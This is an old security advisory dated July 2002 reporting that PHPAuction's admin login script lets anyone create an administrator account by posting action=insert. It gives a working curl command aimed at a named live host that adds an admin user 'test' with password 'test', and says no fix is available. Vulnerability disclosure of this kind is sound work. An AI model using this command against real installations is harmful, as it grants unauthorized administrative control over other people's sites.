|
COMMAND PHPAuction allows anyone to create admin account for this software SYSTEMS AFFECTED All release up till today (03 July 2002) ? PROBLEM ethx says : File /admin/login.php checks only that there is $action set to \"insert\" and then goes ahead and inserts username and password (if both are provided) in adminUsers table. The following line added admin user with username test and password test curl http://pro.phpauction.org/proplus/admin/login.php -d \"action=insert\" -d \"username=test\" -d \"password=test\" SOLUTION None yet